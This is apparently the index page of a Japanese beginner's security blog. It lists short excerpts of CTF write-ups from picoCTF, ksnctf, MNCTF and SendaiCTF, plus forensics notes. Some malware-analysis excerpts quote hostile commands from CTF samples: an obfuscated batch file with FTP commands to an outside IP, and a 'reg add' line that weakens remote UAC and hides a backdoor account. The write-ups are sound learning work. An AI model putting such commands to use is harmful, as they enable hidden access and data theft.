@toRi

できたてほやほやのエンジニアです。インフラ、セキュリティ系です。ふんわり命がけ(´・ω・)

「オンライン・フォレンジックLT大会-Emotet編」のメモ

初めに 株式会社イエラエセキュリティさん主催の「オンライン・フォレンジックLT大会」に参加しました。 「オンライン・フォレンジックLT大会 – Emotetの巻」開催のお知らせ|株式会社イエラエセキュリティ - ハッカーによる脆弱性診断 Emotet感染端末のフォ…

#セキュリティインシデント #フォレンジック #セキュリティ #オンラインセミナー

【DFIR】VirtualBox上でSANSSIFT使ってみた。

環境が変わるごとにツールをインストールするのが面倒になってきたので、 DFIR系ディストリビューション使ってみたいと思い、SANSSIFTを入れることにしました。 しかし、日本語でインストール方法などを書いているページがなかったので、 この先インストール…

picoCTF2018 blaise's cipher - Points: 200

問題 My buddy Blaise told me he learned about this cool cipher invented by a guy also named Blaise! Can you figure out what it says? Connect with nc 2018shell.picoctf.com 18981. ヒント There are tools that make this easy. This cipher was N…

picoCTF2018 hex editor - Points: 150

問題 This cat has a secret to teach you. You can also find the file in /problems/hex-editor_2_c1a99aee8d919f6e42697662d798f0ff on the shell server. 解き方 とりあえず、ncコマンドを実行してみます。 $ nc 2018shell.picoctf.com 18581 ----------…

picoCTF 2018 HEEEEEEERE'S Johnny! - Points: 100

nc 2018shell.picoctf.com 35225 に接続してみると、ログインを求められます。 Linuxのetc/passwdとect/shadowの内容が書かれたファイルが問題で与えられているので、それを参考にログインしていく問題です。 passwadファイルの中身を見てみると、ユーザーは…

picoCTF leak-me - Points: 200

$ nc 2018shell.picoctf.com 57659 What is your name? ctf Hello ctf, Please Enter the Password. ctf Incorrect Password! とりあえずサーバに接続してみましたが、ログインできません。 ソースコードを見てみます。 $ cat auth.c #include #include #inc…

ksnctf Sherlock Holmes 70pt

URLにアクセスしてみます。この三つにアクセスするとこんな感じのページに移りますが、flagの文字はありませんでした。http://ctfq.sweetduet.info:10080/~q26/index.pl の一つ上のディレクトリ(http://ctfq.sweetduet.info:10080/~q26/)に入ってみます。f…

ksnctf Simple Auth II

SQLインジェクションかと思って色々してみるも解けず。。。ほかの人のwriteupを見てみました。どうやらsqlite:database.db の database.dbは相対パスの表記らしいです。http://ctfq.sweetduet.info:10080/~q35/auth.phpのauth.phpをdatabase.dbに置き換えて…

MNCTF 2018 大量不正

この問題は自力で解けず、、、 ほかの人のwriteupみると、ssdeepというツールを使っていました。 ssdeepのインストールがうまくできなかったので、コマンドで色々絞りながら解くことにしました。 各ファイルの中身をみると、一行目だけ5文字程度の数字で、そ…

MNCTF2018 種類特定★★☆ CTF

wiresharkで見てみます。 あきらかに怪しいHTTPの通信があります。 アクセスできそうなURLがありますが、できませんでした。。。 単純にgoogleで”gif malware image” と検索するとursnifというマルウェアの名前(フラグ)が見つかりました。

picoCTF2018 you can't see me - Points: 200

ls -lコマンドでディレクトリ内を見てみると、. のファイル?らしきものが。 このような名前のファイルをcatで見ようとしてもエラーになるので、後ろに*をつけて見てみます。 フラグがありました。

MNCTF 2018 新人奮闘III(マルウェア解析)

マルウェアをStringsコマンドで実行しました。 # strings AD_OptimizationTool.exe !This program cannot be run in DOS mode. .text .data @.import hO @ hK @ h| @ AD Optimizer Optimization successfuly finished.\nThe speed increased 176%. /c net us…

MNCTF 2018 新人奮闘I(マルウェア解析)

問題のzipファイルを展開すると実行ファイルが出てきました。 Linux環境でsha256sum <ファイル名>でSHA256ハッシュ値(フラグ)を求めました。 # sha256sum AD_OptimizationTool.exe f24f5629be2e0f821adb36fe4d47407937f5a318bf96ae3655b628f833040f29 AD_O…

SendaiCTF2018 Net.3 Tomcat脆弱性 100

前問のパケットをみると、ファイルをアップロードしているので、その脆弱性について調べたら以下のような記事がでてきました。

picoCTF Secret Agent - Points: 200

アクセスしてみます。 Flagを押しても、あなたgoogleじゃないでしょ、みたいに拒否されます。 chromeで開いてるのに?? 調べてみたら、chromeでF12を押すとディベロッパーツールが開けて、そこから色々調節するみたいです。 F12→Network→NetworkConditionで…

MNCTF 2018 新人奮闘II(マルウェア解析)

ハッシュ値、ファイルサイズは以下のように求めました。 # md5sum AD_OptimizationTool.exe 541427a9dbe43b10c05b856cdcdc5ba6 AD_OptimizationTool.exe # sha1sum AD_OptimizationTool.exe e0fa838e0f191f97c5dac7a831af60d750432017 AD_OptimizationTool.e…

SendaiCTF 2018 For.1 ダウンロード元URLの特定 100

とりあえず、バイナリデータとしてダウンロードしたファイルを開きます。 最後のほうにexeファイルのURLがありました。

SendaiCTF2018 Net.2 攻撃元の特定 100(ネットワーク)

とりあえず、ネットでTomcatサーバの脆弱性について検索してみました。 Apache Tomcatの「Common Gateway Interface(CGI)」サーブレットに関して、遠隔からのコード実行(Remote Code Execution、RCE)の脆弱性が確認されました。この深刻度の高い脆弱性が…

MNCTF 2018 新人奮闘IV(フォレンジック )

# curl http://mnctf.info/mnctf2018/task/vpn20180712.log | grep vpnadmin 2018/07/13 15:01,vpnadmin,27.117.128.1 前の問題でuser名はvpnadminと分かりました。このコマンドで一発で出てきました。2018/07/13 15:01がフラグです。

MNCTF 2019 標的攻撃Ⅲ(マルウェア)60pts

標的攻撃ⅡのフラグのPPORT_388945a1をネットで検索すると、 OceanLotusというグループ(フラグ)であることが分かる。

MNCTF 2019 情報漏洩Ⅱ(その他) 100pts

batファイルの続きにFTPサーバーへのアクセスが見えるので、アクセスしました。 if A%USERDOMAINJkjNCIMZMscrSkoGFOOM% echo open 157.7.53.197> temp.txt echo P455w0rd>> temp.txt REM Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed d…

MNCTF 2018 新人奮闘V(その他)

前の問題で分かっているIPをググってみます。 2018/07/13 15:01,vpnadmin,27.117.128.1 韓国でした。

MNCTF 2019 情報漏洩I(マルウェア) 100pts

zipファイルを与えられたパスワードを使って解凍しました。 batファイルがあるので、VScodeで開いてみました。 %P%@%r%e%I%c%g%h%E%o%R% %I%o%y%f%J%f%L% %d%R%f%E%R%M%z% %y%T%z%O%g%O%M%L%l% %P%N%F%A%u%M%E%E%I%:%E% %Y% %E% %F%X%b%L%b%S%S%_%W%S%l%t%K%…

MNCTF 2019 標的攻撃Ⅳ(マルウェア)60pts

/c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SUPPORT_388…

MNCTF 2019 建屋制御Ⅰ(ネットワーク) 60pts

設定シートを見てみると、1階のどこかかな?とあたりがつきます。PCAPファイルをWireSharkで開きます。 locationで検索してみます。かなり絞れたのでひとつずつ見ていきます。 1F_factory(フラグ)という文字列がASCIIにありました。

MNCTF 2019 標的攻撃I (フォレンジック)80pts

ディスクイメージファイル(diskimage.vmdk )を渡されるので、FTK Imagerで削除されたファイル等がないか見てみます。 rootディレクトリを見ると、a.exe というファイルが削除された痕跡があります。右クリックしてハッシュ値を取り出します。 ハッシュ値(…

MNCTF 2019 暗証保護(Web) 100pts

サイトにアクセスすると、 パスワードファイルの password.php と、URLを入力するとHTTPのリクエストヘッダとレスポンスヘッダを表示してくれる webchecker.php というサイトのURLがあります。 パスワードファイルはみれませんでした。webcheckerのホスト名…

MNCTF 2019 標的攻撃Ⅱ(マルウェア)60pts

標的攻撃Ⅰで見つけた怪しい実行ファイルを、FTK Imagerを使ってエクスポートします。 マルウェアを実行するのは怖いですが、、、 Linux環境でstringsコマンドで実行しました。 # strings a.EXE !This program cannot be run in DOS mode. .text .data @.impo…

MNCTF 2019 悪意部品(暗号) 100pts

まずはファイルの拡張子はpngとなっているものの、画像ファイルとして開けないので、攻撃グループBlackTechが使うマルウエアPLEADダウンローダ(ヒントのサイト)のようにバイナリエディタで開くことにしました。 いつも使っているVisual Studio Codeの拡張…